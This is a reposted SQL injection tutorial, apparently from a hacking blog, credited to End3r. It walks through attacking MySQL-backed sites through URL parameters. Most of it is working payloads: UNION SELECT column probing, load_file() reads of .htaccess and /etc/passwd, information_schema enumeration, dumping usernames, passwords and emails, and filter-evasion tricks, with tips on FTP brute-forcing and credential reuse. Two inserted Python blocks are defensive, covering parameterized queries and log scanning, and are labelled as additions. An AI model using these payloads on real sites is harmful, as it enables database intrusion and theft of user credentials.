Hi folks. This time I'm posting a good SQL injection tutorial by End3r, which I found quite interesting to read and a gem to share. This SQL injection tutorial will clear up most of your SQL injection doubts and will cleanly phase in an attack strategy for you.

SQL Injection is defined by as:

"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."

Background Information

  • It is considered the most common web vulnerability today
  • It's a flaw in the web application--not the db, or the server
  • Can be injected into: Cookies, Forms, and URL parameters

Lesson Facts

  • This lesson uses MySQL syntax for all examples.
  • This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
  • This lesson only provides SQL injection examples for URL parameters, since it is such a large subject on its own
  • This lesson gives small examples of filter evasion techniques

The Lesson

Some commands you will need to know:

'union all select' : combines two or more select statements into one query and returns all rows

'order by' : used to sort rows after a select statement is executed

'load_file()' : loads a local file from the site or server; examples would be .htaccess or /etc/passwd

'char()' : used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file

'concat()' : combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)

'--' : a comment

'/*' : another type of comment

Injection SQL Queries into URL Parameters

So you've found a site: ''

and want to test if it's vulnerable to SQL Injections. Begin by checking if you can execute some of your own queries, so try:

/index.php?id=5 and 1=0--

If after executing the above statement, nothing has happened and the page has remained the same, you can try:


If neither of those work, for the purposes of this tutorial move on to another site. Otherwise, if a blank page showed up you just might be in luck!

Now we want to find how many columns and which ones are showing when the select statement is executed so we use:

/index.php?id=5 order by 20

If you get an error, decrement the number 20; if there is no error, continue incrementing until you get one. The number just before your error is the number of columns in the table you're selecting from.

For example, if

/index.php?id=5 order by 15

returns no error, but

/index.php?id=5 order by 16

returns an error, then we know that there are 15 columns in our select statement.

The next statement will null the id=5 so the script only executes our commands and not its own, and show us which columns we can extract data from:

/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
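Why the appended comment and the union take effect, and what stops them, as an added example that is not part of End3r's tutorial: the same id values go through a string-built query and through a validated, parameterized one. The articles table, its three columns and the function names are assumptions, and in-memory SQLite stands in for MySQL.

```python
import re
import sqlite3

def make_db():
    # Constructed data: a 3-column table stands in for the tutorial's
    # 15-column query, and in-memory SQLite stands in for MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (5, 'Hello', 'First post')")
    return db

def fetch_vulnerable(db, raw_id):
    # The id parameter is pasted into the SQL text, so the database parses
    # it as SQL; the trailing LIMIT is what an injected comment cuts off.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def fetch_hardened(db, raw_id):
    # Validate first: this parameter is a numeric id and nothing else.
    if re.fullmatch(r"[0-9]{1,9}", raw_id) is None:
        raise ValueError("id must be a non-negative integer")
    # Then bind: the value is sent separately from the SQL text, so it
    # can never be parsed as SQL keywords or comments.
    sql = "SELECT id, title, body FROM articles WHERE id = ? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

def compare(raw_id):
    """Run one id value through both paths; returns (vulnerable, hardened)."""
    db = make_db()
    try:
        hardened = fetch_hardened(db, raw_id)
    except ValueError as err:
        hardened = "rejected: " + str(err)
    return fetch_vulnerable(db, raw_id), hardened

if __name__ == "__main__":
    for value in ("5", "5 and 1=0--", "null union all select 1,2,3--"):
        print(repr(value), compare(value))
```
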

So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.

Now we can begin gathering information!

/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--

As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:

/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--

Now look at your page: user(), database(), and version() are all in one place, separated by a colon. This demonstrates the use of concat() and char().

The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!

Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:


You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google

Session Cookie Trick

Thanks to haZed at In the url type:

'java script:void(document.cookie="PHPSESSID=");'

This will give a session_start() error and an FPD.

Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:

/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--

If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding its location from .htaccess and then logging in to all the password-protected areas that you want to on the site.

If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.

Using information_schema.tables

So you don't have load_file() perms? No problem, we can check for information_schema.tables.

1) 'table_name' is the name of a table that exists in all information_schema tables on every site:

/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--

If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:

-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--

Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time

-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns--

Selects all tables and the columns that go with each table, separated by a colon

2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:

/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--

Then it would show the next table in line so you would modify the above to say:

where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--

Until no more tables show, then you can do the same for the columns.

3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:

/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--

And you'll get the info you requested, of course you can modify that as you like such as:

-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--

-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin'

Replacing Admin with the top user's name such as admin or owner etc..

Final Tips

With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:

/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users

If the page shows up, you know the table exists and you can start guessing column names:

/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users

If you get a username, good job you guessed a correct table and column, otherwise keep guessing.

Filter Evasion Techniques

  • You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
  • Rather than using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
  • Try using the plus sign to split words up: 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
  • Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
  • Be creative
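
From the defender's side, the request patterns in this tutorial and the evasion tricks listed above can be flagged in web server logs once the URI is normalized. This is an added example, not part of the original tutorial; the rule names, functions and log lines are constructed, and hex literals or char() sequences are not decoded.

```python
import re
from urllib.parse import unquote

# Rules are named after the tutorial's steps and run on normalized text.
RULES = {
    "boolean_probe": re.compile(r"\band \d+=\d+"),
    "column_count": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion( all)? select\b"),
    "file_read": re.compile(r"\bload_file ?\("),
    "schema_enum": re.compile(r"\binformation_schema\."),
}
REQUEST = re.compile(r'"[A-Z]+ (.+?) HTTP/[\d.]+"')

def normalize(uri):
    """Undo URL encoding, plus-splitting and mixed case before matching."""
    text = uri
    for _ in range(3):                       # also unwraps double encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"'\s*\+\s*'", "", text)   # 'uni'+'on' -> 'union'
    text = text.replace("+", " ")            # '+' means space in a query
    return re.sub(r"\s+", " ", text).lower()

def scan(log_line):
    """Return the sorted names of the rules a logged request triggers."""
    match = REQUEST.search(log_line)
    if match is None:
        return []
    text = normalize(match.group(1))
    return sorted(name for name, rule in RULES.items() if rule.search(text))

# Constructed access-log lines (documentation IP range, made-up sizes).
PREFIX = '203.0.113.7 - - [01/Jan/2024:00:00:00 +0000] "GET /index.php?id='
SAMPLE_LOG = [
    PREFIX + '5 HTTP/1.1" 200 5120',
    PREFIX + '5%20order%20by%2016 HTTP/1.1" 200 312',
    PREFIX + 'null%20UniON%20aLL%20SeLECt%201,2,3-- HTTP/1.1" 200 5044',
    PREFIX + "null%20'uni'%2B'on'%2B'%20'%2B'all'%2B'%20'%2B'Se'%2B'lect'%201,2,3"
             ' HTTP/1.1" 200 5044',
    PREFIX + 'null%2520union%2520all%2520select%25201,table_name%2520from'
             '%2520information_schema.tables-- HTTP/1.1" 200 5101',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan(line), line.split('"')[1])
```

A hit here is a triage signal for the log reviewer; the query behind the page still needs bound parameters.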


As End3r summarises it -

“Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.

I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL Injections.

Thanks for reading,”

